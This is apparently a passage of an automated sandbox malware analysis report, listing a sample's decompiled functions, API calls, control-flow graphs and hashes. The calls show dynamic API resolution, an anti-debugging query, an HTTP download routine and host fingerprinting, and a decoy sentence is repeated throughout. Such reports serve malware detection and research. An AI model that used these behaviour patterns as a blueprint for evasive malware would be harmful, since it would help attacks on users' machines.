                                  • GetProcAddress.KERNEL32(75900000,01301220), ref: 00BB9D46
                                  • GetProcAddress.KERNEL32(75900000,012F6E88), ref: 00BB9D5E
                                  • GetProcAddress.KERNEL32(75900000,01301268), ref: 00BB9D77
                                  • GetProcAddress.KERNEL32(75900000,01301448), ref: 00BB9D8F
                                  • GetProcAddress.KERNEL32(75900000,012F7088), ref: 00BB9DA7
                                  • GetProcAddress.KERNEL32(75900000,01301460), ref: 00BB9DC0
                                  • GetProcAddress.KERNEL32(75900000,012F7028), ref: 00BB9DD8
                                  • LoadLibraryA.KERNEL32(01301430,?,00BB6CA0), ref: 00BB9DEA
                                  • LoadLibraryA.KERNEL32(01301478,?,00BB6CA0), ref: 00BB9DFB
                                  • LoadLibraryA.KERNEL32(01301490,?,00BB6CA0), ref: 00BB9E0D
                                  • LoadLibraryA.KERNEL32(013014A8,?,00BB6CA0), ref: 00BB9E1F
                                  • LoadLibraryA.KERNEL32(01301418,?,00BB6CA0), ref: 00BB9E30
                                  • GetProcAddress.KERNEL32(75070000,013014C0), ref: 00BB9E52
                                  • GetProcAddress.KERNEL32(75FD0000,01301400), ref: 00BB9E73
                                  • GetProcAddress.KERNEL32(75FD0000,01309890), ref: 00BB9E8B
                                  • GetProcAddress.KERNEL32(75A50000,01309818), ref: 00BB9EAD
                                  • GetProcAddress.KERNEL32(74E50000,012F7008), ref: 00BB9ECE
                                  • GetProcAddress.KERNEL32(76E80000,01309558), ref: 00BB9EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00BB9F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00BB9EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 23d41d17526cbc9fac2bd6ef8dd862a3952413d2112016f2b9c0fd581814412f
                                  • Instruction ID: e3ed365295c450a61dfe00fe3b6afc051fac8b7fa3f3a5775e5beaad37350c33
                                  • Opcode Fuzzy Hash: 23d41d17526cbc9fac2bd6ef8dd862a3952413d2112016f2b9c0fd581814412f
                                  • Instruction Fuzzy Hash: D9A1A0B55096419FC344DFABFC889527BB9A74D345340862AFA9DE3231EB7099C8CF60
                                  Function 00BA4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 ba4610-ba46e5 RtlAllocateHeap 781 ba46f0-ba46f6 764->781 782 ba479f-ba47f9 VirtualProtect 781->782 783 ba46fc-ba479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA465F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BA47EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA47CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46A7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA47C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA47AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA478F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA47B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4707
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA467D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 15affa8a17726a2a4c8321b75b6231d4d0a7be5d83a75bf8b72f4f29324b7d24
                                  • Instruction ID: 027549805b7647ed8acdd3b442dd772f57a966d337727bff494a5caf3d6558fd
                                  • Opcode Fuzzy Hash: 15affa8a17726a2a4c8321b75b6231d4d0a7be5d83a75bf8b72f4f29324b7d24
                                  • Instruction Fuzzy Hash: 5741CE707C370C7B8778F7A6A94EFDD76A65F46710B90708FEC0896290CAB066E04529
                                  Function 00BA62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 ba62d0-ba635b call bbaab0 call ba4800 call bbaa50 InternetOpenA StrCmpCA 1040 ba635d 1033->1040 1041 ba6364-ba6368 1033->1041 1040->1041 1042 ba6559-ba6575 call bbaab0 call bbab10 * 2 1041->1042 1043 ba636e-ba6392 InternetConnectA 1041->1043 1062 ba6578-ba657d 1042->1062 1045 ba6398-ba639c 1043->1045 1046 ba654f-ba6553 InternetCloseHandle 1043->1046 1048 ba63aa 1045->1048 1049 ba639e-ba63a8 1045->1049 1046->1042 1051 ba63b4-ba63e2 HttpOpenRequestA 1048->1051 1049->1051 1053 ba63e8-ba63ec 1051->1053 1054 ba6545-ba6549 InternetCloseHandle 1051->1054 1056 ba63ee-ba640f InternetSetOptionA 1053->1056 1057 ba6415-ba6455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1058 ba647c-ba649b call bb8ad0 1057->1058 1059 ba6457-ba6477 call bbaa50 call bbab10 * 2 1057->1059 1067 ba6519-ba6539 call bbaa50 call bbab10 * 2 1058->1067 1068 ba649d-ba64a4 1058->1068 1059->1062 1067->1062 1071 ba64a6-ba64d0 InternetReadFile 1068->1071 1072 ba6517-ba653f InternetCloseHandle 1068->1072 1076 ba64db 1071->1076 1077 ba64d2-ba64d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 ba64dd-ba6515 call bbacc0 call bbabb0 call bbab10 1077->1080 1080->1071
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • InternetOpenA.WININET(00BC0DFF,00000001,00000000,00000000,00000000), ref: 00BA6331
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA63D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA6421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BA644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA64BD
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA653F
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6549
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 11d470ef66eaa940c7f73e47a031d10be2c21768f2752079d3620ccacaf3b8ab
                                  • Instruction ID: 7dc331c3abf6a94ebdd228505384360b7456e533a100788abc164a097d146dec
                                  • Opcode Fuzzy Hash: 11d470ef66eaa940c7f73e47a031d10be2c21768f2752079d3620ccacaf3b8ab
                                  • Instruction Fuzzy Hash: 77713BB1A04218ABDF24DBA4CC59FEE77B9EB45700F1081D9F50A7B190DBB46A84CF51
                                  Function 00BB7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 bb7690-bb76da GetWindowsDirectoryA 1357 bb76dc 1356->1357 1358 bb76e3-bb7757 GetVolumeInformationA call bb8e90 * 3 1356->1358 1357->1358 1365 bb7768-bb776f 1358->1365 1366 bb778c-bb77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 bb7771-bb778a call bb8e90 1365->1367 1369 bb77a9-bb77b6 call bbaa50 1366->1369 1370 bb77b8-bb77e8 wsprintfA call bbaa50 1366->1370 1367->1365 1377 bb780e-bb781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BB76D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BB770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB779A
                                  • wsprintfA.USER32 ref: 00BB77D0
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 5bcb2334236ac90b4c9a0f7f2a0ee056c5ec5811a4f5c84a35b9360d6f6c501e
                                  • Instruction ID: 1ee6bab3b1acd59f3e50ffa839a2936e7c283986f86ffd50a2cd3ccd34313120
                                  • Opcode Fuzzy Hash: 5bcb2334236ac90b4c9a0f7f2a0ee056c5ec5811a4f5c84a35b9360d6f6c501e
                                  • Instruction Fuzzy Hash: 234184B1D44348AFDB10DB95DC85BEEB7B8AF48704F1040D9F509B7280DBB4AA84CBA5
                                  Function 00BB79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB7A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 890202ed6604eecdbab3fb55d5e4d5a2173e56124a0df162646515b92ae23d27
                                  • Instruction ID: f639339fe9dd5cf3e7cfbd8d9c5e8586b04891ef42d85fc94e1e9c0fda0a714d
                                  • Opcode Fuzzy Hash: 890202ed6604eecdbab3fb55d5e4d5a2173e56124a0df162646515b92ae23d27
                                  • Instruction Fuzzy Hash: 84F0AFB1948209EFCB00DF89DC45BAEBBB8EB04711F10025AF619A3690C7B41544CBA0
                                  Function 00BA1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
